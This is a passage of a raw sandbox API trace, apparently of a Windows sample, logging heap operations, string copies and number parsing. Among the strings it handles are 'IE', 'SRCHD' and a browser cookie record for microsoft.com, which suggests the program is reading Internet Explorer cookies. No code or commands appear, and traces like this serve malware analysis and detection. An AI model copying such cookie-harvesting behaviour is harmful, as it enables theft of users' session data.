(hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.403] StrToInt64ExA (in: pszString="1820274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.403] lstrlenA (lpString="|") returned 1 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.403] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f630 [0181.403] lstrcpyA (in: lpString1=0x61f630, lpString2="|" | out: lpString1="|") returned="|" [0181.403] lstrlenA (lpString="1024") returned 4 [0181.403] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f580 [0181.404] lstrcpyA (in: lpString1=0x61f580, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.404] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.404] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.404] lstrlenA (lpString="1820274944") returned 10 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f530 [0181.404] lstrcpyA (in: lpString1=0x61f530, lpString2="1820274944" | out: lpString1="1820274944") returned="1820274944" [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.404] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.404] StrToInt64ExA (in: pszString="1820274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.404] lstrlenA (lpString="|") returned 1 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.404] lstrcpyA (in: lpString1=0x61f590, lpString2="|" | out: lpString1="|") returned="|" [0181.404] lstrlenA (lpString="|") returned 1 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5d0 [0181.404] lstrcpyA (in: lpString1=0x61f5d0, lpString2="|" | out: lpString1="|") returned="|" [0181.404] lstrlenA (lpString="|") returned 1 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.404] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.404] lstrcpyA (in: lpString1=0x61f480, lpString2="|" | out: lpString1="|") returned="|" [0181.404] lstrlenA (lpString="|") returned 1 [0181.404] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f600 [0181.405] lstrcpyA (in: lpString1=0x61f600, lpString2="|" | out: lpString1="|") returned="|" [0181.405] lstrlenA (lpString="|") returned 1 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.405] lstrcpyA (in: lpString1=0x61f5b0, lpString2="|" | out: lpString1="|") returned="|" [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5a0 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f640 [0181.405] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f540 [0181.405] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.405] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5a0, Size=0x1) returned 0x61f640 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5a0 [0181.405] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] GetProcessHeap () returned 0x5f0000 [0181.405] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f540 [0181.406] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.406] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f490, Size=0xb) returned 0x61f4a0 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f540 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0181.406] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f4a0 [0181.406] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.406] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f490, Size=0xb) returned 0x61f550 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.406] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f490 [0181.406] GetProcessHeap () returned 0x5f0000 [0181.407] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.407] lstrlenA (lpString="SRCHD") returned 5 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f550 [0181.407] lstrcpyA (in: lpString1=0x61f550, lpString2="SRCHD" | out: lpString1="SRCHD") returned="SRCHD" [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f5a0 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0181.407] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f4a0 [0181.407] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.407] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5a0, Size=0x9) returned 0x61f4a0 [0181.407] lstrlenA (lpString="") returned 0 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5a0 [0181.407] lstrcpyA (in: lpString1=0x61f5a0, lpString2="" | out: lpString1="") returned="" [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5c0 [0181.407] GetProcessHeap () returned 0x5f0000 [0181.407] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f6e0 [0181.407] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6e0 | out: hHeap=0x5f0000) returned 1 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f7f0 [0181.408] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7f0 | out: hHeap=0x5f0000) returned 1 [0181.408] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5c0, Size=0x1) returned 0x61f7b0 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f5c0 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f6d0 [0181.408] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6d0 | out: hHeap=0x5f0000) returned 1 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f6f0 [0181.408] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.408] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6f0 | out: hHeap=0x5f0000) returned 1 [0181.408] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5c0, Size=0xd) returned 0x61f790 [0181.408] lstrlenA (lpString="IE") returned 2 [0181.408] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f5c0 [0181.409] lstrcpyA (in: lpString1=0x61f5c0, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x6361a0 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f770 [0181.409] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f770 | out: hHeap=0x5f0000) returned 1 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f6e0 [0181.409] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6e0 | out: hHeap=0x5f0000) returned 1 [0181.409] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6361a0, Size=0x11) returned 0x636080 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636320 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636320, Size=0x23) returned 0x6137d0 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636120 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636120, Size=0x27) returned 0x613b00 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636180 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636180, Size=0x29) returned 0x6137a0 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636220 [0181.409] GetProcessHeap () returned 0x5f0000 [0181.409] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636220, Size=0x41) returned 0x620820 [0181.410] GetProcessHeap () returned 0x5f0000 [0181.410] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x21) returned 0x613950 [0181.410] GetProcessHeap () returned 0x5f0000 [0181.410] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613950, Size=0x43) returned 0x6209b0 [0181.410] GetProcessHeap () returned 0x5f0000 [0181.410] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x6139b0 [0181.410] GetProcessHeap () returned 0x5f0000 [0181.410] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613b90 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b90, Size=0x45) returned 0x620140 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x6136b0 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6136b0, Size=0x55) returned 0x618710 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2b) returned 0x613920 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613920, Size=0x57) returned 0x618b30 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2c) returned 0x613740 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613740, Size=0x6b) returned 0x625040 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x36) returned 0x635350 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635350, Size=0x6d) returned 0x611f60 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x37) returned 0x635710 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635710, Size=0x81) returned 0x61caf0 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x41) returned 0x620190 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620190, Size=0x83) returned 0x61c790 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x42) returned 0x620960 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x42) returned 0x6208c0 [0181.411] GetProcessHeap () returned 0x5f0000 [0181.411] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6208c0, Size=0x87) returned 0x61cca0 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cca0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620960 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c790 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625040 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618b30 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620140 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6139b0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6209b0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b00 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137d0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636080 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f790 | out: hHeap=0x5f0000) returned 1 [0181.412] GetProcessHeap () returned 0x5f0000 [0181.412] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7b0 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.413] GetProcessHeap () returned 0x5f0000 [0181.413] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613ad0 | out: hHeap=0x5f0000) returned 1 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6201e0 | out: hHeap=0x5f0000) returned 1 [0181.414] lstrlenA (lpString="\n") returned 1 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f620 [0181.414] lstrcpyA (in: lpString1=0x61f620, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.414] lstrlenA (lpString="\nSRCHUID\nV=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472662977\n30913481\n") returned 120 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x79) returned 0x625040 [0181.414] lstrcpyA (in: lpString1=0x625040, lpString2="\nSRCHUID\nV=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472662977\n30913481\n" | out: lpString1="\nSRCHUID\nV=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472662977\n30913481\n") returned="\nSRCHUID\nV=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1\nmicrosoft.com/\n1024\n1820274944\n30991936\n3472662977\n30913481\n" [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f540 [0181.414] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.414] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.414] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.414] GetProcessHeap () returned 0x5f0000 [0181.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.415] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f490, Size=0x5) returned 0x61f520 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x79) returned 0x611f60 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] 